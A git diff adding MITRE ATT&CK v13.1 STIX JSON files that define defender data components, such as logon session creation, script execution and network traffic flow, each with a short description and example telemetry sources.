diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--9085a576-636a-455b-91d2-c2921bbe6d1d.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--9085a576-636a-455b-91d2-c2921bbe6d1d.json
new file mode 100644
index 0000000000000000000000000000000000000000..5c8ca664e6d40c3253af9bf4a806ad7e700ab6ea
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--9085a576-636a-455b-91d2-c2921bbe6d1d.json
@@ -0,0 +1,23 @@
+{
+ "type": "bundle",
+ "id": "bundle--21b8755a-d1b1-4d02-81e0-a03ea1580791",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "x-mitre-data-component--9085a576-636a-455b-91d2-c2921bbe6d1d",
+ "type": "x-mitre-data-component",
+ "created": "2021-10-20T15:05:19.274Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "modified": "2021-10-20T15:05:19.274Z",
+ "name": "Active Directory Object Deletion",
+ "description": "Removal of an active directory object (ex: Windows EID 5141)",
+ "x_mitre_data_source_ref": "x-mitre-data-source--d6188aac-17db-4861-845f-57c369f9b4c8",
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--91b3ed33-d1b5-4c4b-a896-76c55eb3cfd8.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--91b3ed33-d1b5-4c4b-a896-76c55eb3cfd8.json
new file mode 100644
index 0000000000000000000000000000000000000000..924c3018e5fd95dc8849ea124e9c4e226e54cbe6
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--91b3ed33-d1b5-4c4b-a896-76c55eb3cfd8.json
@@ -0,0 +1,23 @@
+{
+ "type": "bundle",
+ "id": "bundle--ce6b62d9-c140-44b3-84f8-394c56dd2b20",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "x-mitre-data-component--91b3ed33-d1b5-4c4b-a896-76c55eb3cfd8",
+ "type": "x-mitre-data-component",
+ "created": "2021-10-20T15:05:19.274Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "modified": "2021-10-20T15:05:19.274Z",
+ "name": "Container Enumeration",
+ "description": "An extracted list of containers (ex: docker ps)",
+ "x_mitre_data_source_ref": "x-mitre-data-source--072ec5a7-00ba-466f-9057-69751a22a967",
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--93a6e38c-02a5-44d8-9035-b2e08459f31f.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--93a6e38c-02a5-44d8-9035-b2e08459f31f.json
new file mode 100644
index 0000000000000000000000000000000000000000..ff580fc66e9155bbacd030cc217b7c0e8d943a7d
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--93a6e38c-02a5-44d8-9035-b2e08459f31f.json
@@ -0,0 +1,25 @@
+{
+ "type": "bundle",
+ "id": "bundle--5becc2d9-fdc3-4419-b721-237b817e0ec6",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "modified": "2022-10-20T20:20:12.165Z",
+ "name": "Malware Metadata",
+ "description": "Contextual data about a malicious payload, such as compilation times, file hashes, as well as watermarks or other identifiable configuration information",
+ "x_mitre_data_source_ref": "x-mitre-data-source--b86d9b40-5fbe-4ef1-8dc3-263eff26f495",
+ "x_mitre_deprecated": false,
+ "x_mitre_version": "1.1",
+ "type": "x-mitre-data-component",
+ "id": "x-mitre-data-component--93a6e38c-02a5-44d8-9035-b2e08459f31f",
+ "created": "2021-10-20T15:05:19.271Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "revoked": false,
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e.json
new file mode 100644
index 0000000000000000000000000000000000000000..5b0f7a33a103617ef13d3a665d3cdc56dea3e205
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e.json
@@ -0,0 +1,25 @@
+{
+ "type": "bundle",
+ "id": "bundle--3b417d40-62f3-47b7-807e-1f40d9a1fbaa",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "modified": "2023-04-21T15:41:36.287Z",
+ "name": "OS API Execution",
+ "description": "Operating system function/method calls executed by a process",
+ "x_mitre_data_source_ref": "x-mitre-data-source--e8b8ede7-337b-4c0c-8c32-5c7872c1ee22",
+ "x_mitre_deprecated": false,
+ "x_mitre_version": "1.0",
+ "type": "x-mitre-data-component",
+ "id": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
+ "created": "2021-10-20T15:05:19.272Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "revoked": false,
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "x_mitre_attack_spec_version": "3.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa.json
new file mode 100644
index 0000000000000000000000000000000000000000..17f23f62bed2396809bad49cef2a29e172fbe641
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa.json
@@ -0,0 +1,23 @@
+{
+ "type": "bundle",
+ "id": "bundle--cbabc778-e54f-4fb3-9998-f9abeaf4f9c1",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa",
+ "type": "x-mitre-data-component",
+ "created": "2021-10-20T15:05:19.272Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "modified": "2021-10-20T15:05:19.272Z",
+ "name": "Application Log Content",
+ "description": "Logging, messaging, and other artifacts provided by third-party services (ex: metrics, errors, and/or alerts from mail/web applications)",
+ "x_mitre_data_source_ref": "x-mitre-data-source--40269753-26bd-437b-986e-159c66dec5e4",
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--9ce98c86-8d30-4043-ba54-0784d478d0b5.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--9ce98c86-8d30-4043-ba54-0784d478d0b5.json
new file mode 100644
index 0000000000000000000000000000000000000000..78583bc32ab68dc0cd73d70042dcf67e4974676b
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--9ce98c86-8d30-4043-ba54-0784d478d0b5.json
@@ -0,0 +1,25 @@
+{
+ "type": "bundle",
+ "id": "bundle--57f35d6e-30ef-43ac-819e-b3f64e445118",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "modified": "2022-10-07T16:18:20.802Z",
+ "name": "Logon Session Creation",
+ "description": "Initial construction of a successful new user logon following an authentication attempt. (e.g. Windows EID 4624, /var/log/utmp, or /var/log/wmtp)",
+ "x_mitre_data_source_ref": "x-mitre-data-source--4358c631-e253-4557-86df-f687d0ef9891",
+ "x_mitre_deprecated": false,
+ "x_mitre_version": "1.1",
+ "type": "x-mitre-data-component",
+ "id": "x-mitre-data-component--9ce98c86-8d30-4043-ba54-0784d478d0b5",
+ "created": "2021-10-20T15:05:19.274Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "revoked": false,
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--9f387817-df83-432a-b56b-a8fb7f71eedd.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--9f387817-df83-432a-b56b-a8fb7f71eedd.json
new file mode 100644
index 0000000000000000000000000000000000000000..18d134427049a0e81db4b367500fda566c93a088
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--9f387817-df83-432a-b56b-a8fb7f71eedd.json
@@ -0,0 +1,25 @@
+{
+ "type": "bundle",
+ "id": "bundle--19892567-8cc7-4078-baa2-38aed837e965",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "modified": "2022-10-07T16:16:55.269Z",
+ "name": "Script Execution",
+ "description": "The execution of a text file that contains code via the interpreter (e.g. Powershell, WMI, Windows EID 4104, etc.)",
+ "x_mitre_data_source_ref": "x-mitre-data-source--12c1e727-7fa4-49b6-af81-366ed2ce231e",
+ "x_mitre_deprecated": false,
+ "x_mitre_version": "1.1",
+ "type": "x-mitre-data-component",
+ "id": "x-mitre-data-component--9f387817-df83-432a-b56b-a8fb7f71eedd",
+ "created": "2021-10-20T15:05:19.272Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "revoked": false,
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--a5ae90ca-0c4b-481c-959f-0eb18a7ff953.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--a5ae90ca-0c4b-481c-959f-0eb18a7ff953.json
new file mode 100644
index 0000000000000000000000000000000000000000..cc9f658e306677fc7b0acaeb2139ada9f7595f39
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--a5ae90ca-0c4b-481c-959f-0eb18a7ff953.json
@@ -0,0 +1,23 @@
+{
+ "type": "bundle",
+ "id": "bundle--bf7d1f2f-f52d-4f4f-815c-c8f969aafc9e",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "x-mitre-data-component--a5ae90ca-0c4b-481c-959f-0eb18a7ff953",
+ "type": "x-mitre-data-component",
+ "created": "2021-10-20T15:05:19.274Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "modified": "2021-10-20T15:05:19.274Z",
+ "name": "Container Creation",
+ "description": "Initial construction of a new container (ex: docker create )",
+ "x_mitre_data_source_ref": "x-mitre-data-source--072ec5a7-00ba-466f-9057-69751a22a967",
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a.json
new file mode 100644
index 0000000000000000000000000000000000000000..e40ef6cf012437f85685aec90228d5a79d1f7268
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a.json
@@ -0,0 +1,23 @@
+{
+ "type": "bundle",
+ "id": "bundle--399e3ff3-14a0-4581-a45f-7cfe489746a7",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a",
+ "type": "x-mitre-data-component",
+ "created": "2021-10-20T15:05:19.274Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "modified": "2021-10-20T15:05:19.274Z",
+ "name": "Network Traffic Flow",
+ "description": "Summarized network packet data, with metrics, such as protocol headers and volume (ex: Netflow or Zeek http.log)",
+ "x_mitre_data_source_ref": "x-mitre-data-source--c000cd5c-bbb3-4606-af6f-6c6d9de0bbe3",
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--a953ca55-921a-44f7-9b8d-3d40141aa17e.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--a953ca55-921a-44f7-9b8d-3d40141aa17e.json
new file mode 100644
index 0000000000000000000000000000000000000000..90ac90defe340db832db8d5e9852b65e138d1d0b
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--a953ca55-921a-44f7-9b8d-3d40141aa17e.json
@@ -0,0 +1,25 @@
+{
+ "type": "bundle",
+ "id": "bundle--b81a02b6-0c4b-4a82-9bcb-39c01f6aa379",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "modified": "2022-10-07T16:19:46.282Z",
+ "name": "User Account Authentication",
+ "description": "An attempt by a user to gain access to a network or computing resource, often by providing credentials (ex: Windows EID 4776 or /var/log/auth.log)",
+ "x_mitre_data_source_ref": "x-mitre-data-source--0b4f86ed-f4ab-46a3-8ed1-175be1974da6",
+ "x_mitre_deprecated": false,
+ "x_mitre_version": "1.1",
+ "type": "x-mitre-data-component",
+ "id": "x-mitre-data-component--a953ca55-921a-44f7-9b8d-3d40141aa17e",
+ "created": "2021-10-20T15:05:19.271Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "revoked": false,
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--b008766d-f34f-4ded-b712-659f59aaed6e.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--b008766d-f34f-4ded-b712-659f59aaed6e.json
new file mode 100644
index 0000000000000000000000000000000000000000..834852ec6883ba3487a52b57371f29c3e332103f
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--b008766d-f34f-4ded-b712-659f59aaed6e.json
@@ -0,0 +1,23 @@
+{
+ "type": "bundle",
+ "id": "bundle--d71a0496-f4d2-4e0d-b428-0ad97e234f68",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "x-mitre-data-component--b008766d-f34f-4ded-b712-659f59aaed6e",
+ "type": "x-mitre-data-component",
+ "created": "2021-10-20T15:05:19.271Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "modified": "2021-10-20T15:05:19.271Z",
+ "name": "Image Creation",
+ "description": "Initial construction of a virtual machine image (ex: Azure Compute Service Images PUT)",
+ "x_mitre_data_source_ref": "x-mitre-data-source--1ac0ca69-e07e-4b34-9061-e4588e146c52",
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--b33d36e3-d7ea-4895-8eed-19a08a8f7c4f.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--b33d36e3-d7ea-4895-8eed-19a08a8f7c4f.json
new file mode 100644
index 0000000000000000000000000000000000000000..3e52f7dffc7d18067d1f2f9bb7ffed71ec61cef9
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--b33d36e3-d7ea-4895-8eed-19a08a8f7c4f.json
@@ -0,0 +1,23 @@
+{
+ "type": "bundle",
+ "id": "bundle--3df9b3ef-cd98-4876-94b4-b43b2963bcfc",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "x-mitre-data-component--b33d36e3-d7ea-4895-8eed-19a08a8f7c4f",
+ "type": "x-mitre-data-component",
+ "created": "2021-10-20T15:05:19.274Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "modified": "2021-10-20T15:05:19.274Z",
+ "name": "Cloud Service Metadata",
+ "description": "Contextual data about a cloud service and activity around it such as name, type, or purpose/function",
+ "x_mitre_data_source_ref": "x-mitre-data-source--b1ddede4-cafe-4955-ac4c-14b33ac3f647",
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--b597a220-6510-4397-b0d8-342cd2c58827.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--b597a220-6510-4397-b0d8-342cd2c58827.json
new file mode 100644
index 0000000000000000000000000000000000000000..956044ba0ad191d3857ab03829c1f902a32a37d8
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--b597a220-6510-4397-b0d8-342cd2c58827.json
@@ -0,0 +1,23 @@
+{
+ "type": "bundle",
+ "id": "bundle--553465bd-10e6-46a3-a60e-29d24d979f9a",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "x-mitre-data-component--b597a220-6510-4397-b0d8-342cd2c58827",
+ "type": "x-mitre-data-component",
+ "created": "2021-10-20T15:05:19.272Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "modified": "2021-10-20T15:05:19.272Z",
+ "name": "Image Metadata",
+ "description": "Contextual data about a virtual machine image such as name, resource group, state, or type",
+ "x_mitre_data_source_ref": "x-mitre-data-source--1ac0ca69-e07e-4b34-9061-e4588e146c52",
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--b5b0e8ae-7436-4951-950a-7b83c4dd3f2c.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--b5b0e8ae-7436-4951-950a-7b83c4dd3f2c.json
new file mode 100644
index 0000000000000000000000000000000000000000..0402afa3d09b5e487459d907b752a50ec1fa0c6c
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--b5b0e8ae-7436-4951-950a-7b83c4dd3f2c.json
@@ -0,0 +1,23 @@
+{
+ "type": "bundle",
+ "id": "bundle--37f8d05b-3c05-478f-8801-6ffce86222db",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "x-mitre-data-component--b5b0e8ae-7436-4951-950a-7b83c4dd3f2c",
+ "type": "x-mitre-data-component",
+ "created": "2021-10-20T15:05:19.274Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "modified": "2021-10-20T15:05:19.274Z",
+ "name": "Instance Creation",
+ "description": "Initial construction of a new instance (ex: instance.insert within GCP Audit Logs)",
+ "x_mitre_data_source_ref": "x-mitre-data-source--45232bc0-e858-440d-aa93-d48c6cf167f0",
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--b5d0492b-cda4-421c-8e51-ed2b8d85c5d0.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--b5d0492b-cda4-421c-8e51-ed2b8d85c5d0.json
new file mode 100644
index 0000000000000000000000000000000000000000..6d7739d3f153e77ba1c017a9b0507cf896a5ca65
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--b5d0492b-cda4-421c-8e51-ed2b8d85c5d0.json
@@ -0,0 +1,23 @@
+{
+ "type": "bundle",
+ "id": "bundle--6ef2a76f-af7a-4463-aefc-a9fb1044ce8d",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "x-mitre-data-component--b5d0492b-cda4-421c-8e51-ed2b8d85c5d0",
+ "type": "x-mitre-data-component",
+ "created": "2021-10-20T15:05:19.271Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "modified": "2021-10-20T15:05:19.271Z",
+ "name": "User Account Metadata",
+ "description": "Contextual data about an account, which may include a username, user ID, environmental data, etc.",
+ "x_mitre_data_source_ref": "x-mitre-data-source--0b4f86ed-f4ab-46a3-8ed1-175be1974da6",
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--b9a1578e-8653-4103-be23-cb52e0b1816e.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--b9a1578e-8653-4103-be23-cb52e0b1816e.json
new file mode 100644
index 0000000000000000000000000000000000000000..1e6d54bb5ae3af1a54c92bbff00c20e764c32727
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--b9a1578e-8653-4103-be23-cb52e0b1816e.json
@@ -0,0 +1,23 @@
+{
+ "type": "bundle",
+ "id": "bundle--9b306762-dd03-4b32-b7a9-ec4fac7e8c84",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "x-mitre-data-component--b9a1578e-8653-4103-be23-cb52e0b1816e",
+ "type": "x-mitre-data-component",
+ "created": "2021-10-20T15:05:19.273Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "modified": "2021-10-20T15:05:19.273Z",
+ "name": "Named Pipe Metadata",
+ "description": "Contextual data about a named pipe on a system, including pipe name and creating process (ex: Sysmon EIDs 17-18)",
+ "x_mitre_data_source_ref": "x-mitre-data-source--221adcd5-cccf-44df-9be6-ef607a6e1c3c",
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--b9d031bb-d150-4fc6-8025-688201bf3ffd.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--b9d031bb-d150-4fc6-8025-688201bf3ffd.json
new file mode 100644
index 0000000000000000000000000000000000000000..93ad0bb626404b43f169db94d669fb886b899b48
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--b9d031bb-d150-4fc6-8025-688201bf3ffd.json
@@ -0,0 +1,23 @@
+{
+ "type": "bundle",
+ "id": "bundle--450dee5f-0c6d-4143-9a51-0fbd9809806e",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "x-mitre-data-component--b9d031bb-d150-4fc6-8025-688201bf3ffd",
+ "type": "x-mitre-data-component",
+ "created": "2021-10-20T15:05:19.271Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "modified": "2021-10-20T15:05:19.271Z",
+ "name": "Firmware Modification",
+ "description": "Changes made to firmware, including its settings and/or data, such as MBR (Master Boot Record) and VBR (Volume Boot Record)",
+ "x_mitre_data_source_ref": "x-mitre-data-source--ca1cb239-ff6d-4f64-b9d7-41c8556a8b4f",
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--bf91faa8-0049-4870-810a-4df55e0b77ee.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--bf91faa8-0049-4870-810a-4df55e0b77ee.json
new file mode 100644
index 0000000000000000000000000000000000000000..6f3bb22527b6783409d61c6bec8d3c023b22a292
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--bf91faa8-0049-4870-810a-4df55e0b77ee.json
@@ -0,0 +1,23 @@
+{
+ "type": "bundle",
+ "id": "bundle--14820c77-7557-4975-ab69-5b83cb67a1dc",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "x-mitre-data-component--bf91faa8-0049-4870-810a-4df55e0b77ee",
+ "type": "x-mitre-data-component",
+ "created": "2021-10-20T15:05:19.273Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "modified": "2021-10-20T15:05:19.273Z",
+ "name": "Firewall Enumeration",
+ "description": "An extracted list of available firewalls and/or their associated settings/rules (ex: Azure Network Firewall CLI Show commands)",
+ "x_mitre_data_source_ref": "x-mitre-data-source--f2f4f4bd-3455-400f-b2ee-104004df0f5b",
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
